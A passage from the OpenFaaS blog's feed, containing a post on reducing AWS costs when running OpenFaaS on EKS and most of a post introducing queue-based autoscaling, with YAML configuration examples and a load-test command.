<p>Whilst this may look like a simple change, it affects a large number of code paths, and whilst we have strived to minimise impact, there may be some edge cases that we have missed. If your CI pipeline breaks for any reason, you can pin the release binary of faas-cli to the last version before this feature was introduced: <a href="https://github.com/openfaas/faas-cli/releases"><code class="language-plaintext highlighter-rouge">0.17.8</code></a>.</p>

<p>The majority of the work has been carried out via the following <a href="https://github.com/openfaas/faas-cli/pull/1012">pull request</a> and tested by the full time team.</p>

<p>For those of us that do start pinning our templates, we must also remember to update them over time, to the latest Release as it becomes available, or to the latest SHA available in the default branch.</p>

<p>For questions, comments, and suggestions reach out via your support channel of choice whether that’s Slack, the Customer Community on GitHub, or Email.</p>]]></content><author><name>OpenFaaS Ltd</name></author><category term="templates" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[As of version `0.18.0` of the faas-cli, you can now pin templates to a specific version via the stack.yaml file for more reproducible builds and to avoid unexpected changes.]]></summary></entry><entry><title type="html">Optimise OpenFaaS costs on AWS</title><link href="https://www.openfaas.com/blog/optimise-openfaas-aws-costs/" rel="alternate" type="text/html" title="Optimise OpenFaaS costs on AWS" /><published>2025-09-17T00:00:00+00:00</published><updated>2025-09-17T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/optimise-openfaas-aws-costs</id><content type="html" xml:base="https://www.openfaas.com/blog/optimise-openfaas-aws-costs/"><![CDATA[<p>Whilst OpenFaaS comes with predictable, flat-rate pricing, AWS is charged based upon consumption. We’ll explore how to save money and optimise our costs.</p>

<h2 id="introduction">Introduction</h2>

<p>There are a few common reasons why customers may decide to pay for OpenFaaS, and deploy it to AWS instead of using AWS Lambda, a serverless product that’s offered by AWS.</p>

<ul>
  <li>Control over limits - many settings that are restricted on AWS Lambda are configurable with OpenFaaS - from timeouts, to container runtimes, to CPU/memory limits.</li>
  <li>Portability - customers often start with an easy and convenient option like Lambda before obtaining an enterprise customer that requires an additional deployment on-premises or into another cloud provider. Lambda is locked into AWS.</li>
  <li>Cost savings - whilst Lambda starts within a free tier allowance, it can quickly get out of hand, and the cross-over point for a paid OpenFaaS license can be met quite quickly.</li>
  <li>No need for cold starts - OpenFaaS functions maintain 1/1 replicas by default, unless you configure scale to zero on them. So there’s no need for any cold start, for critical functions.</li>
  <li>No false economy - in order to keep Lambda costs reasonable, users will often under-provision the resources for their functions, or worse, over-provision them in order to get more vCPU.</li>
  <li>Kubernetes all the way - if your team already deploys to Kubernetes, then Lambda is orthogonal and means your developers have to build and operate code in two different systems.</li>
</ul>

<p>Of course there are other reasons, but these points stand out across customers.</p>

<table>
  <thead>
    <tr>
      <th>Aspect</th>
      <th>AWS Lambda</th>
      <th>OpenFaaS on EKS</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Free Tier</td>
      <td>Yes (limited)</td>
      <td>Free for personal use. Commercial use has predictable flat-rate licensing.</td>
    </tr>
    <tr>
      <td>Scaling Cost</td>
      <td>Per invocation + duration</td>
      <td>EC2 - can optimise with autoscaling, spot instances, and scale to zero</td>
    </tr>
    <tr>
      <td>Cold Starts</td>
      <td>Unavoidable unless kept “warm”</td>
      <td>No cold-start by default</td>
    </tr>
    <tr>
      <td>Speed up the runtime</td>
      <td>Add more RAM to get a bit more vCPU</td>
      <td>Pick any amount of vCPU or RAM, or allocate NVMe for super fast storage</td>
    </tr>
    <tr>
      <td>Access to GPUs</td>
      <td>Not available</td>
      <td>Yes, available using a node group with GPU instances</td>
    </tr>
    <tr>
      <td>Total Cost at Scale</td>
      <td>Can spike with traffic or increased product adoption/function execution time</td>
      <td>Stable costs. Spot instances can reduce EC2 by up to 90%</td>
    </tr>
    <tr>
      <td>Plays nicely with your Kubernetes deployments?</td>
      <td>No, orthogonal tooling and development</td>
      <td>Uses native Kubernetes objects including a CRD</td>
    </tr>
    <tr>
      <td>Customise the limits/environment for functions</td>
      <td>No</td>
      <td>Yes, most settings can be changed easily</td>
    </tr>
    <tr>
      <td>Time to deploy</td>
      <td>Can take minutes to rollout a new version via CloudFormation</td>
      <td>New version can be live in single-digit seconds</td>
    </tr>
    <tr>
      <td>Portability</td>
      <td>None</td>
      <td>Run the same functions on any Kubernetes cluster in the cloud or on-premises</td>
    </tr>
  </tbody>
</table>

<h2 id="knobs-and-dials-for-controlling-cost">Knobs and dials for controlling cost</h2>

<p><strong>Kubernetes control-plane</strong></p>

<p>Typically, you’ll deploy OpenFaaS to Kubernetes on AWS using their managed product <a href="https://aws.amazon.com/eks/">Elastic Kubernetes Service (EKS)</a>. EKS has a running cost per cluster of around $75 USD per month.</p>

<p>You can also self-manage Kubernetes with a tool like <a href="https://k3s.io/">K3s</a> for more flexibility. But bear in mind, if you’re staying on AWS, the cost per control plane is not going to add up to a lot.</p>

<p><strong>The unwritten costs of AWS</strong></p>

<p>This is beyond the scope of our article that focuses on AWS EKS, <a href="https://aws.amazon.com/ec2/">EC2</a> and OpenFaaS, but take all the usual advice in hand on optimising or reducing the use of CloudWatch, S3, NAT gateways, and other AWS services.</p>

<ul>
  <li>Use VPC endpoints for AWS services (e.g., S3, DynamoDB) to avoid public internet fees—savings of $0.01/GB or more.</li>
  <li>Minimize cross-AZ traffic by pinning functions to single-AZ nodes if latency allows.</li>
</ul>

<p>Take a detailed look at your monthly bill with <a href="https://aws.amazon.com/aws-cost-management/aws-cost-explorer/">AWS Cost Explorer</a>.</p>

<p>Avoid <a href="https://cloudgov.ai/resources/blog/how-to-save-money-on-amazon-eks-clusters-with-extended-support-version-updates/">EKS Extended Support fees</a>. EKS charges $0.60/hr per cluster if you linger on an unsupported Kubernetes version. Keep a quarterly upgrade policy (N-2 policy) to stay on the standard $0.10/hr control-plane price.</p>

<p><strong>Kubernetes nodes</strong></p>

<p>Kubernetes requires nodes to run your Pods, which are usually provided by AWS EC2 (virtual machines). AWS also offers products like Fargate, but Fargate tends to be more expensive, and slower to start up.</p>

<p>The cost of nodes can be optimised in three ways:</p>

<ol>
  <li>
    <p>Right-size your nodes to match the functions.</p>

    <p>By default, nodes can only run 100 Pods, so if you have many many Pods for your functions, using larger nodes could be a false economy.</p>
  </li>
  <li>
    <p>Use autoscaling to scale nodes up and down based on demand.</p>

    <p>One of our customers runs a separate production and staging EKS cluster, but the staging cluster costs them very little. With scale to zero enabled on all their functions, they can get away with a single node that just runs the control-plane, at a very low cost. As soon as a function is started, it’ll either load up on the existing node, or a new one will be added and removed after the function scales back down to zero again.</p>

    <p>You’re likely aware of the benefits of AWS Savings Plans or Reserved Instances (RIs) for baseline nodes. If you are expecting your product to be in business for the next year or three, you can commit to purchase a certain amount of EC2 from AWS and get decent savings in return without any disk of the instances being terminated.</p>
  </li>
  <li>
    <p>Use spot instances to save up to 90% of your costs.</p>

    <p>Spot instances are the most obvious way to save money on AWS, cutting EC2 bills by up to 90%, however they do have some downsides. Spot instances can be terminated at any time, with just two minutes’ notice. The open-source node-autoscaler built by AWS for EC2 called <a href="https://karpenter.sh/">Karpenter</a> can help you out here, but we also need to remember that a spot instance can take 1-2 minutes to start up, register, and start running a Pod. We created the <a href="https://openfaas.com/blog/headroom-controller/">Headroom Controller</a> to help reduce this delay, and the impact of instances being terminated.</p>
  </li>
</ol>

<p><strong>Check yourself</strong></p>

<p>We often see teams using nodes that are far too large, due to RAM/vCPU sizing that was taken from AWS Lambda, where you have to allocate more RAM to get additional vCPU quota. In one instance, a team needed to keep 300 functions “warm” and had historically allocated 3GB of RAM to each function. Why did they do that? When asked, they had no idea why that number was picked or how much RAM they actually needed.</p>

<p>Kubernetes doesn’t play by these rules, you can simply ask for what is required. The <a href="https://docs.openfaas.com/architecture/metrics/">metrics built-into</a> OpenFaaS can be used to monitor the resource usage of your functions and adjust the node size accordingly.</p>

<p><strong>Open your Arms</strong></p>

<p>In 2015, I had to recompile Docker from source to be able to run it on a Raspberry Pi. In fact I even had to recompile Go first as a prerequisite.</p>

<p>These days, Kubernetes and core tooling like ArgoCD, Helm, cert-manager, Istio, NATS, Prometheus, and Grafana all work flawlessly on the Arm architecture.</p>

<p>If you’re an AWS user, you should absolutely consider and experiment with running functions on Graviton instances. Whether that’s the whole collection, or just specific functions.</p>

<p>In return you’ll get fast performance and cost savings, whilst helping to reduce your carbon footprint since Arm chips tend to use way less energy.</p>

<p>The following page entitled <a href="https://docs.aws.amazon.com/prescriptive-guidance/latest/optimize-costs-microsoft-workloads/net-graviton.html">Use Graviton instances and containers</a> shows a 19.20% - 14.99% reduction in costs from using Graviton.</p>

<p>AWS Case study: <a href="https://aws.amazon.com/blogs/hpc/performance-gains-with-aws-graviton4-a-devitopro-case-study/">Performance gains with AWS Graviton4 – a DevitoPRO case study</a></p>

<p><strong>OpenFaaS licensing</strong></p>

<p>Each installation of OpenFaaS requires a separate license key.</p>

<p>If you have environments that sound like this: Dev, QA, UAT, Staging, Pre-Prod, DR, Prod, then OpenFaaS could work out quite expensive.</p>

<p>To optimise your costs, you may want to reevaluate whether you <em>really need</em> as many as 7 different Kubernetes clusters to test your functions in before finally rolling them out to production. For OpenFaaS for Enterprises, we can sometimes offer custom package for this type of scenario, so definitely reach out to us for a call.</p>

<p>An alternative option when you have many environments is to use OpenFaaS for Enterprises and its multiple-namespace support. In this way, the various environments become Kubernetes namespaces that are isolated from one another. It’s also ideal for centrally managed IT, FaaS offered as a service to employees, and for multi-tenant environments.</p>

<p><strong>Scale to Zero for functions</strong></p>

<p><a href="https://docs.openfaas.com/openfaas-pro/scale-to-zero/">Scale to Zero</a> for functions is a feature that allows your functions to scale down to zero when they are not being used. This can help you save money on your AWS costs by reducing the number of EC2 instances that are running at any given time.</p>

<p>The idle timeout can be set on a per-function basis, and unlike AWS Lambda, it’s opt-in. No need to keep a background process invoking your function wastefully, just in case.</p>

<p>You can learn how autoscaling and scale to zero work together in this blog post: <a href="https://www.openfaas.com/blog/what-goes-up-must-come-down/">On Autoscaling - What Goes Up Must Come Down</a></p>

<p><strong>Delete old/unused functions</strong></p>

<p>If you are running a large installation of OpenFaaS and have accumulated a large number of functions, you can review the metrics to understand which are no longer being used.</p>

<p>There are two approaches:</p>

<ol>
  <li>Use the built-in <a href="https://prometheus.io/">Prometheus</a> metrics (defaults to 14 days of retention) to identify functions which can be removed. Or use your own long-term storage i.e. DataDog to search back even further.</li>
  <li>If you’re using a multi-tenant installation of OpenFaaS for Enterprises, you can enable <a href="https://docs.openfaas.com/openfaas-pro/billing-metrics/">Billing Webhooks</a> and track invocations over time in a database. You can then use this data to run a clean-up via Cron.</li>
</ol>

<p><strong>Do you really need Kubernetes?</strong></p>

<p>We built another version of OpenFaaS called <a href="https://docs.openfaas.com/deployment/edge/">OpenFaaS Edge</a>. It’s designed to run on a single VM or bare-metal host and can run up to 1000 functions.</p>

<p>OpenFaaS Edge is perfect for automations, background jobs, and other tasks that do not need to scale beyond a single machine or a single replica.</p>

<p>If you’re willing to do some legwork, it can also be installed on different hosts to shard functions across multiple machines.</p>

<p><strong>Consider other compute providers than AWS</strong></p>

<p>AWS EKS is probably the most platform that our customers use to deploy and manage OpenFaaS, but it’s not the only game in town.</p>

<p>For one, other compute providers may offer a better baseline cost for their VMs, or larger instances for similar pricing.</p>

<p>If you really want to crush costs, then moving to bare-metal is a great option - it can enable much more density at a lower cost per function. Bare-metal doesn’t have to mean buying a datacenter, or installing OpenStack on a few racks.</p>

<p>Providers such as <a href="https://www.hetzner.com/">Hetzner</a> offer ridiculous value in comparison to AWS:</p>

<p>For x86_64:</p>
<ul>
  <li>EX44 (52 USD / mo ) - 20 vCPU, 64GB RAM, 2x 512 NVMe SSD</li>
  <li>A102 (139 USD / mo) - 32vCPU, 128GB RAM, 2x 1.92TB NVMe SSD</li>
  <li>AX162-R (256 USD / mo) - 96 vCPU, 256GB RAM, 2x 1.92TB NVMe SSD</li>
</ul>

<p>For ARM:</p>
<ul>
  <li>RX220 (292 USD / mo) - 80 vCPU, 256GB RAM, 2x 3.84 TB NVMe SSD</li>
</ul>

<table>
  <thead>
    <tr>
      <th>Provider</th>
      <th>Instance / host</th>
      <th>Storage</th>
      <th>vCPU</th>
      <th>RAM</th>
      <th>Monthly cost</th>
      <th>Notes</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>AWS</td>
      <td>m5.4xlarge</td>
      <td>EBS</td>
      <td>16</td>
      <td>64GB</td>
      <td>~$300</td>
      <td>EBS is much slower than a local NVMe. Bandwidth costs extra. CPU is slower.</td>
    </tr>
    <tr>
      <td>Hetzner</td>
      <td>EX44</td>
      <td>NVMe</td>
      <td>20</td>
      <td>64GB</td>
      <td>$52</td>
      <td>Fast local NVMe, bare-metal density. Bandwidth is unmetered and included in cost.</td>
    </tr>
  </tbody>
</table>

<p>Now once you have that bare-metal that may be capable of running well over 100 Pods, you’re still going to be limited by the default limit of Kubernetes of 100 Pods per node.</p>

<p>The solution is to use a lightweight Firecracker microVM and we have a well supported solution that works with OpenFaaS and Kubernetes.</p>

<p>Using <a href="https://slicervm.com">SlicerVM.com</a>, you can densely pack in as many nodes as you can fit by slicing up each server, and installing Highly Available Kubernetes using <a href="https://k3sup.dev/">K3sup</a>, or a similar Kubernetes distribution of your choice. SlicerVM.com can run over multiple machines, so you can retain high-availability without introducing a single point of failure.</p>

<p>Slicer can also autoscale Kubernetes nodes, meaning you can recycle them instead of having to manage them like pets. That means no need to worry about OS patching and updates.</p>

<p>Hetzner’s prices are remarkable, but <a href="https://docs.actuated.com/provision-server/">other companies</a> offer bare-metal in the cloud too.</p>

<p>What if you simply cannot move off AWS? You’re half way through a SOC II audit, and can’t take on any new vendors? Perhaps do some initial research and experimentation, so that when you are in a position to review costs, you can make an accurate comparison.</p>

<p>Here’s how quick and easy it is to setup HA Kubernetes with SlicerVM</p>

<div style="width: ; margin:0 auto;">
    
    <div class="ytcontainer">
        <iframe class="yt" allowfullscreen="" src="https://www.youtube.com/embed/YMPyNrYEVLA"></iframe>
    </div>
</div>

<p><a href="https://docs.slicervm.com/examples/ha-k3s/">Click here to view the documentation</a>.</p>

<h2 id="wrapping-up">Wrapping up</h2>

<p>Most OpenFaaS customers enable a few sane defaults and largely don’t mention the cost of their hosting provider. Why? I think typically, the below is well understood by many customers. Maybe there’s something new below that could help you and your team? Maybe there’s something we didn’t mention, reach out and let us know!</p>

<p>From the top:</p>

<ul>
  <li>Do consider Arm and Graviton for a clear cost reduction and performance increase.</li>
  <li>Do use autoscaling nodes with something like Karpenter or an AWS-managed nodepool.</li>
  <li>Do consider whether spot instances can fit into your workflow.</li>
  <li>Do enable scale to zero where a modest coldstart is acceptable, or where functions run mainly asynchronously.</li>
  <li>Don’t overprovision CPU/RAM just because that’s what you had for a cloud function in the past.</li>
</ul>

<p>We realise that many teams have made a firm commitment to stay on AWS and cannot consider another vendor, or self-hosting. But, if you can, do consider bare-metal, or on-premises infrastructure. Maybe you could run part of your product on a different cloud provider, if it meant getting the 5-6x cost reductions we outlined in the example with Hetzner?</p>

<p>Finally, if you are in need of help, reach out to us using your existing communication channels with us. Or if you’re new here via our <a href="https://www.openfaas.com/pricing/">Pricing page</a>.</p>

<p>Related links:</p>

<ul>
  <li><a href="https://www.openfaas.com/blog/what-goes-up-must-come-down/">On Autoscaling - What Goes Up Must Come Down</a></li>
  <li><a href="https://www.openfaas.com/blog/eks-openfaas-karpenter/">Save costs on AWS EKS with OpenFaaS and Karpenter</a></li>
  <li><a href="https://www.openfaas.com/blog/scale-to-zero-gpus/">Scale to zero GPUs with OpenFaaS, Karpenter and AWS EKS</a></li>
  <li><a href="https://www.openfaas.com/blog/headroom-controller/">Scale Up Pods Faster in Kubernetes with Added Headroom</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="costs" /><category term="optimisation" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[Whilst OpenFaaS comes with predictable, flat-rate pricing, AWS is charged based upon consumption. We'll explore how to save money.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-09-reduce-costs/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-09-reduce-costs/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Introducing Queue Based Scaling for Functions</title><link href="https://www.openfaas.com/blog/queue-based-scaling/" rel="alternate" type="text/html" title="Introducing Queue Based Scaling for Functions" /><published>2025-07-29T00:00:00+00:00</published><updated>2025-07-29T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/queue-based-scaling</id><content type="html" xml:base="https://www.openfaas.com/blog/queue-based-scaling/"><![CDATA[<p>Queue-Based Scaling is a long awaited feature for OpenFaaS that matches queued requests to the exact amount of replicas almost instantly.</p>

<p>The initial version of OpenFaaS released in 2016 had effective, but rudimentary autoscaling based upon Requests Per Second (RPS) and was driven through AlertManager, a component of the Prometheus project. In 2019, with growing needs of commercial users with long running jobs, we rewrote the autoscaler to query metrics directly from functions and Kubernetes to fine-tune how functions scaled.</p>

<p>OpenFaaS already has a versatile set of scaling modes that can be fine tuned such as: Requests Per Second (RPS), Capacity (inflight connections/concurrency), CPU, and Custom scaling modes. This new mode is specialised to match the needs of large amounts of background tasks and long running processing tasks.</p>

<h2 id="what-is-queue-based-scaling">What is Queue-Based Scaling?</h2>

<p>Queue-Based Scaling is a new autoscaling mode for OpenFaaS functions. It is made possible by supporting changes that emit queue depth metrics for each function that’s being invoked asynchronously.</p>

<p>This new scaling mode fits well for functions that are:</p>

<ul>
  <li>Primarily invoked asynchronously</li>
  <li>May have a large backlog of requests</li>
  <li>Need to scale up to the maximum number of replicas as quickly as possible</li>
  <li>Run in batches, bursts, or spikes for minutes to hours</li>
</ul>

<p>Typical tasks include: Extract, Transform, Load (ETL) jobs, security/asset auditing and analysis, data processing, image processing, video transcoding, and file scanning, backup/synchronisation, and other background tasks.</p>

<p>All previous scaling modes used <em>output metrics</em> from the function to determine the amount of replicas, which can involve some lag as the invocations build up from a few per second, to hundreds or thousands per second.</p>

<p>When using the queue-depth, we have an <em>input metric</em> that is available immediately, and can be used to set the exact number of replicas needed to process the backlog of requests.</p>

<p><strong>A note from a customer</strong></p>

<p><a href="https://www.workwithsurge.com">Surge</a> is a lending platform providing in-depth financial analysis, insights and risk management for their clients. They use dozens of OpenFaaS functions to process data in long-running asynchronous jobs. Part of that involves synchronising data between <a href="https://www.salesforce.com">Salesforce.com</a> and Snowflake, a data warehousing solution.</p>

<p>Kevin Lindsay, Principal Engineer at Surge rolled out Queue-Based Scaling for their existing functions and said:</p>

<blockquote>
  <p>“We just changed the <code class="language-plaintext highlighter-rouge">com.openfaas.scale.type</code> to <code class="language-plaintext highlighter-rouge">queue</code> and now async is basically instantly reactive, burning through large queues in minutes”</p>
</blockquote>

<p>Kevin explained that Surge makes heavy use of Datadog for logging and insights, which charges based upon various factors, including the number of Pods and Nodes in the cluster. So unnecessary Pods, and extra capacity in the cluster means a larger bill, so having reactive horizontal scaling and scale to zero is a big win for them.</p>

<p><strong>Load test - Comparing Queue-Based Scaling to Capacity Scaling</strong></p>

<p>We ran a load test to compare the new Queue-Based Scaling mode to the existing Capacity scaling mode. Capacity mode is also effective for asynchronous invocations, and functions that are invoked in a hybrid manner (i.e. a mixture of both synchronous and asynchronous invocations).</p>

<p>For the test, we used <code class="language-plaintext highlighter-rouge">hey</code> to generate 1000 invocations of the sleep function from the store. Each invocation had a variable run-time of 10-25s to simulate a long-running job.</p>

<p>You will see a number of retries in the graphs emitted as 429 responses from the function. This is because we set a hard-limit of 5 inflight connections per replica to simulate a limited or expensive resource such as API calls or database connections.</p>

<p>First up - Capacity Scaling:</p>

<p><img src="/images/2025-07-queue-based/capacity-scaling.png" alt="Load test with capacity mode" /></p>

<p>We see that the load starts low, and builds up as the number of inflight connections increases, and the autoscaler responds by adding more replicas.</p>

<p>It is effective, but given that all of the invocations are asynchronous, we already had the data to scale up to the maximum number of replicas immediately.</p>

<p>Next up - Queue-Based Scaling:</p>

<p><img src="/images/2025-07-queue-based/queue-scaling.png" alt="Load test with queue mode" /></p>

<p>The load metric in this screenshot is the equivalent of the pending queue-depth.</p>

<p>We see the maximum number of replicas jump to 10 and remain there until the queue is emptied, which means the load (which is the number of invocations) is also able to start out at the maximum level.</p>

<h2 id="how-does-it-work">How does it work?</h2>

<p>Just like all the other autoscaling modes, basic ranges are set on the <a href="https://docs.openfaas.com/reference/yaml/">function’s stack.yaml</a> file, or via <a href="https://docs.openfaas.com/reference/rest-api/">REST API call</a></p>

<p><strong>A quick recap on scaling modes</strong></p>

<p>One size does not fit all, and to give a quick summary:</p>

<ul>
  <li>RPS - a default, and useful for most functions that execute quickly</li>
  <li>Capacity - also known as “inflight connections” or “concurrency” - best for long running jobs or those which are going to be limited on concurrency</li>
  <li>CPU - a good fit when RPS/Capacity aren’t working as expected</li>
  <li>Custom - any metric that you can find in Prometheus, or emit from some component of your stack can be used to drive scaling</li>
</ul>

<p><strong>Demo with Queue-Based Scaling</strong></p>

<p>First, you can set a custom range for the minimum and maximum number of replicas (or use the defaults):</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">functions</span><span class="pi">:</span>
  <span class="na">etl</span><span class="pi">:</span>
    <span class="na">labels</span><span class="pi">:</span>
        <span class="na">com.openfaas.scale.min</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1"</span>
        <span class="na">com.openfaas.scale.max</span><span class="pi">:</span> <span class="s2">"</span><span class="s">100"</span>
</code></pre></div></div>

<p>Then, you specify whether it should also scale to zero, with an optional custom idle period:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">labels</span><span class="pi">:</span>
        <span class="na">com.openfaas.scale.zero</span><span class="pi">:</span> <span class="s2">"</span><span class="s">true"</span>
        <span class="na">com.openfaas.scale.zero-duration</span><span class="pi">:</span> <span class="s2">"</span><span class="s">5m"</span>
</code></pre></div></div>

<p>Finally, you can set the scaling mode and how many requests per Pod to target:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">labels</span><span class="pi">:</span>
        <span class="na">com.openfaas.scale.mode</span><span class="pi">:</span> <span class="s2">"</span><span class="s">queue"</span>
        <span class="na">com.openfaas.scale.target</span><span class="pi">:</span> <span class="s2">"</span><span class="s">10"</span>
        <span class="na">com.openfaas.scale.target-proportion</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1"</span>
</code></pre></div></div>

<p>With all of the above, we have a function that:</p>

<ul>
  <li>Scales from 1 to 10 replicas</li>
  <li>Scales to zero after 5 minutes of inactivity</li>
  <li>For each 10 requests in the queue, we will get 1 Pod</li>
</ul>

<p>So if you have to scan 1,000,000 CSV files from an AWS S3 Bucket, you could enqueue one request for each file. This would create a queue depth of 1M requests and so the autoscaler would immediately create 100 Pods (the maximum set via the label).</p>

<p>In any of the prior modes, the Queue Worker would have to build up a steady flow of requests, in order for the scaling to take place.</p>

<p>If you wanted to generate load in a rudimentary way, you could use the open source tool <code class="language-plaintext highlighter-rouge">hey</code>, to submit i.e. 2.5 million requests to the above function.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hey <span class="nt">-d</span> PAYLOAD <span class="nt">-m</span> POST <span class="nt">-n</span> 2500000 <span class="nt">-c</span> 100 http://127.0.0.1:8080/async-function/etl
</code></pre></div></div>

<p>Any function invoked via the queue-worker can also return its result via a webhook, if you pass in a URL via the <code class="language-plaintext highlighter-rouge">X-Callback-Url</code> header.</p>

<h2 id="concurrency-limiting-and-retrying-requests">Concurrency limiting and retrying requests</h2>

<p>Queued requests can be limited in concurrency, and retried if they fail.</p>

<p>Hard concurrency limiting can be achieved by setting the <code class="language-plaintext highlighter-rouge">max_inflight</code> environment variable i.e. <code class="language-plaintext highlighter-rouge">10</code> would mean the 11th request gets a 429 Too Many Requests response.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">environment</span><span class="pi">:</span>
        <span class="na">max_inflight</span><span class="pi">:</span> <span class="s2">"</span><span class="s">10"</span>
</code></pre></div></div>

<p><a href="https://docs.openfaas.com/openfaas-pro/retries/">Retries</a> are already configured as a system-wide default from the Helm chart, but they can be overridden on a per function basis, which is important for long running jobs that may take a while to complete.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="na">annotations</span><span class="pi">:</span>
      <span class="na">com.openfaas.retry.attempts</span><span class="pi">:</span> <span class="s2">"</span><span class="s">100"</span>
      <span class="na">com.openfaas.retry.codes</span><span class="pi">:</span> <span class="s2">"</span><span class="s">429"</span>
      <span class="na">com.openfaas.retry.min_wait</span><span class="pi">:</span> <span class="s2">"</span><span class="s">5s"</span>
      <span class="na">com.openfaas.retry.max_wait</span><span class="pi">:</span> <span class="s2">"</span><span class="s">5m"</span>
</code></pre></div></div>

<h2 id="better-fairness-and-efficiency">Better fairness and efficiency</h2>

<p>The previous version of the Queue Worker created a single Consumer for all invocations.</p>

<p>That meant that if you had 10,000 invocations come in from one tenant for their functions, they would likely block any other requests that came in after that.</p>

<p>The new mode creates a Consumer per function, where each Consumer gets scheduled independently into a work queue.</p>

<p>If you do find that certain tenants, or functions are monopolising the queue, you can provision dedicated queues using the <a href="https://github.com/openfaas/faas-netes/tree/master/chart/queue-worker">Queue Worker Helm chart</a>.</p>

<p>Let’s picture the difference by observing the Grafana Dashboard for the Queue Worker.</p>

<p>In the first picture, we’ll show the default mode “static” where a single Consumer is created for all functions, and asynchronous invocations are processed in a FIFO manner.</p>

<p>The sleep-1 function has all of its invocations processed first, and sleep-2 is unable to make any progress until the first function has been processed.</p>

<p><img src="/images/2025-07-queue-based/fairness-static.png" alt="Queue metrics dashboard in static mode" /></p>

<p>Next, we show two functions that are invoked asynchronously, but this time with the new “function” mode. Each function has its own Consumer, and so they can be processed independently.</p>

<p><img src="/images/2025-07-queue-based/fairness-function.png" alt="Queue metrics dashboard in function mode" /></p>

<p>Here, we see that the sleep-1 function is still being processed first, but the sleep-2 function is also able to make progress at the same time.</p>

<h2 id="what-changes-have-been-made">What changes have been made?</h2>

<p>A number of changes have been made to support Queue-Based Scaling:</p>

<ul>
  <li>
    <p>Queue Worker - the component that performs asynchronous invocations</p>

    <p>When set to run in “function” mode, it will now create a Consumer per function with queued requests.</p>

    <p>It deletes any Consumers once all available invocations have been processed.* Helm chart - new scaling rule and type “queue”</p>

    <p>No changes were needed in the autoscaler, however the Helm chart introduces a new scaling rule named “queue”</p>
  </li>
  <li>
    <p>Gateway - publish invocations to an updated subject</p>

    <p>Previously all messages were published to a single subject in NATS which meant no metric could be obtained on a per-function basis.</p>

    <p>The updated subject format includes the function name, allowing for precise queue depth metrics to be collected.</p>
  </li>
</ul>

<p>Note that the 0.5.x gateway will start publishing messages to a new subject format, so if you update the gateway, you must also update the Queue Worker to 0.4.x or later, otherwise the Queue Worker will not be able to consume any messages.</p>

<p>This includes any dedicated or separate queue-workers that you have deployed, update them using the separate queue-worker Helm chart.</p>

<h2 id="how-do-you-turn-it-all-on">How do you turn it all on?</h2>

<p>Since these features change the way that OpenFaaS works, and we value backwards compatibility, Queue-Based Scaling is an opt-in feature.</p>

<p>First, update to the latest version of the OpenFaaS Helm chart which includes:</p>

<ul>
  <li>Queue Worker 0.4.x or later</li>
  <li>Gateway 0.5.x or later</li>
</ul>

<p>Then configure the following in your <code class="language-plaintext highlighter-rouge">values.yaml</code> file:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">jetstreamQueueWorker:
</span>  mode: function
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">mode</code> variable can be set to <code class="language-plaintext highlighter-rouge">static</code> to use the previous FIFO / single Consumer model, or <code class="language-plaintext highlighter-rouge">function</code> to use the new Consumer per function model.</p>

<p>At the same time, as introducing this new setting, we have deprecated an older configuration option that is no longer needed: <code class="language-plaintext highlighter-rouge">queueMode</code>.</p>

<p>So if you have a <code class="language-plaintext highlighter-rouge">queueMode</code> setting in your <code class="language-plaintext highlighter-rouge">values.yaml</code>, you can now safely remove it so long as you stay on a newer version of the Helm chart.</p>

<p>In the main chart, the <code class="language-plaintext highlighter-rouge">jetstreamQueueWorker.durableName</code> field is no longer used or required.</p>

<h3 id="dedicated-queue-workers">Dedicated queue-workers</h3>

<p>If you have dedicated queue-workers deployed, you will need to update them using the separate queue-worker Helm chart.</p>

<p>A new field is introduced called <code class="language-plaintext highlighter-rouge">queueName</code> in values.yaml, the default value is not set. When it is not set, the queue will take the name of the stream.</p>

<p>So if you had an annotation of <code class="language-plaintext highlighter-rouge">com.openfaas.queue=slow-fns</code>, you would set the <code class="language-plaintext highlighter-rouge">queueName</code> like this in values.yaml:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">maxInflight: 5
</span><span class="gi">+queueName: slow-fns
</span><span class="p">mode: static
nats:
</span>  stream:
    name: slow-fns
  consumer:
    durableName: slow-fns-workers
<span class="p">upstreamTimeout: 15m  
</span></code></pre></div></div>

<p>Alternatively, you can leave <code class="language-plaintext highlighter-rouge">queueName</code> as empty, or not set it at all, and the name will be taken from <code class="language-plaintext highlighter-rouge">nats.stream.name</code>.</p>

<p>The top level setting <code class="language-plaintext highlighter-rouge">durableName</code> has now been removed.</p>

<p>You can read more in the <a href="https://github.com/openfaas/faas-netes/blob/master/chart/queue-worker/README.md">README</a> for the queue-worker chart.</p>

<h2 id="wrapping-up">Wrapping up</h2>

<p>A quick summary about Queue-Based Scaling:</p>

<ul>
  <li>The Queue-Worker consumes messages in a fairer way than previously</li>
  <li>It creates Consumers per function but only when they have some work to do</li>
  <li>The new <code class="language-plaintext highlighter-rouge">queue</code> scaling mode is reactive and precise - setting the exact number of replicas immediately</li>
